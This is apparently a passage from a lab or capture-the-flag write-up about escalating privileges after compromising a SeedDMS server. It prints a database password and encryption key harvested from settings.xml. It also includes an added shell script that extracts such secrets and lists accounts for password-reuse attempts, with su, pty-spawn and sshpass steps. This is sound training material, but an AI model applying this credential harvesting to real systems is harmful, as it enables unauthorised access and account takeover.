Configuration File


After some limited basic system enumeration, I decided to go through the file system, hoping to find any information useful for escalating privileges. Since I gained my foothold by exploiting a SeedDMS instance, I will check the application directory first.

$ ls -la /var/www/html/                                    
total 0
drwxr-xr-x. 3 root  root  24 Nov  3  2020 .
drwxr-xr-x. 4 root  root  33 Nov  3  2020 ..
drwxr-xr-x. 7 nginx nginx 68 Apr 21  2020 seeddms51x
 
$ ls -la /var/www/html/seeddms51x
total 0
drwxr-xr-x.  7 nginx nginx  68 Apr 21  2020 .
drwxr-xr-x.  3 root  root   24 Nov  3  2020 ..
drwxr-xr-x.  2 nginx nginx  93 Mar  2  2020 conf
drwxr-xr-x.  9 nginx nginx 117 Apr 21  2020 data
drwxr-xr-x.  6 nginx nginx 101 Dec  3  2019 pear
drwxr-xr-x. 14 root  root  256 May 10  2021 seeddms
drwxr-xr-x.  3 nginx nginx 207 Jul 30  2019 www

It seems that SeedDMS is the only web application hosted under /var/www/html. Inside the application directory there is a conf directory.

$ ls -la /var/www/html/seeddms51x/conf   
total 40
drwxr-xr-x. 2 nginx nginx    93 Mar  2  2020 .
drwxr-xr-x. 7 nginx nginx    68 Apr 21  2020 ..
-rw-r--r--. 1 nginx nginx   261 Jan 15  2020 .htaccess
-r--------. 1 nginx nginx 11933 Apr 21  2020 settings.xml
-rw-r--r--. 1 nginx nginx 13771 Mar 14  2018 settings.xml.template
-rw-r--r--. 1 nginx nginx  4247 Feb 20  2013 stopwords.txt

There is a settings.xml file. It is mode 0400 and owned by nginx, so only that user (and root) can read it; the cat below succeeds, so the current shell runs as nginx. It may contain either web or database credentials.

DB Credential


$ cat /var/www/html/seeddms51x/conf/settings.xml           
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <site>
  
    [...REDACTED...]
    
    <calendar enableCalendar="true" calendarDefaultView="y" firstDayOfWeek="0">
    </calendar>
  <webdav enableWebdavReplaceDoc="true"/></site>
  <system>
    <server rootDir="/var/www/html/seeddms51x/seeddms/" httpRoot="/seeddms51x/seeddms/" contentDir="/var/www/html/seeddms51x/data/" stagingDir="/var/www/html/seeddms51x/data/staging/" luceneDir="/var/www/html/seeddms51x/data/lucene/" logFileEnable="true" logFileRotation="d" enableLargeFileUpload="false" partitionSize="2000000" cacheDir="/var/www/html/seeddms51x/data/cache/" dropFolderDir="" backupDir="" repositoryUrl="" maxUploadSize="" enableXsendfile="false">
    </server>
    <authentication enableGuestLogin="false" enablePasswordForgotten="false" restricted="true" enableUserImage="false" disableSelfEdit="false" passwordStrength="0" passwordStrengthAlgorithm="simple" passwordExpiration="10" passwordHistory="0" loginFailure="0" autoLoginUser="0" quota="0" undelUserIds="" encryptionKey="cfecb42d13f2e1666cddde56991a2cbf" cookieLifetime="0" enableGuestAutoLogin="false" defaultAccessDocs="0">
      <connectors>
        <connector enable="false" type="ldap" host="ldaps://ldap.host.com" port="389" baseDN="" bindDN="" bindPw="">
        </connector>
        <connector enable="false" type="AD" host="ldap.example.com" port="389" baseDN="" accountDomainName="example.com" bindDN="" bindPw="">
        </connector>
      </connectors>
    </authentication>
    
    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
    </database>
    <smtp smtpServer="localhost" smtpPort="25" smtpSendFrom="seeddms@localhost" smtpUser="" smtpPassword=""/>    
  </system>
  <advanced>
[...REDACTED...]
  </advanced>
 
<extensions><extension name="example"/></extensions></configuration>

While there is a lot of information about the application configuration, the important finding is the database credential: seeddms:ied^ieY6xoquu. The same file also exposes the application's encryptionKey, so a readable settings.xml is worth the time even when the database is not reachable. The next step is to test every local user for password reuse.
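The extraction and the user enumeration above can be scripted so the same check is quick on the next host. The following is an example added by the editor, not code from the original writeup: it pulls the credential-bearing attributes out of a SeedDMS settings.xml with a line-oriented sed (SeedDMS writes each element on one line, so no XML parser is needed), and lists local accounts with a real login shell as password-reuse candidates. The function names, the attribute list and the passwd file used in the usage call are assumptions for illustration.

```shell
#!/bin/sh
# Example added by the editor, not part of the original writeup.
# Pull credential-bearing attributes out of a SeedDMS settings.xml and
# list local accounts worth trying them against.

# Print the value of attribute $2 (attr="...") from file $1.
# First occurrence only: bindPw appears once per LDAP/AD connector.
xml_attr() {
    sed -n "s/.*[[:space:]]$2=\"\([^\"]*\)\".*/\1/p" "$1" | head -n 1
}

# Print "user:password" for the <database> element.
seeddms_db_creds() {
    printf '%s:%s\n' "$(xml_attr "$1" dbUser)" "$(xml_attr "$1" dbPass)"
}

# Print every non-empty secret-bearing attribute as name=value, one per line.
# Attribute list is an assumption based on the settings.xml shown above.
seeddms_secrets() {
    for a in dbPass smtpPassword bindPw encryptionKey; do
        v=$(xml_attr "$1" "$a")
        if [ -n "$v" ]; then
            printf '%s=%s\n' "$a" "$v"
        fi
    done
}

# Local accounts with a real login shell, read from a passwd-format file
# ($1, default /etc/passwd). These are the password-reuse candidates.
login_users() {
    awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ {print $1}' "${1:-/etc/passwd}"
}

# Usage (paths are assumptions):
# seeddms_db_creds /var/www/html/seeddms51x/conf/settings.xml
# seeddms_secrets  /var/www/html/seeddms51x/conf/settings.xml
# login_users      /etc/passwd
```

The actual reuse test is interactive because su reads the password from the controlling tty, not stdin: for each candidate, run `su - <user> -c id` from a proper tty (spawn one with `python3 -c 'import pty; pty.spawn("/bin/sh")'` first if the web shell lacks one) and paste the recovered password; if SSH is exposed, the same loop can be driven from the attacking host with sshpass.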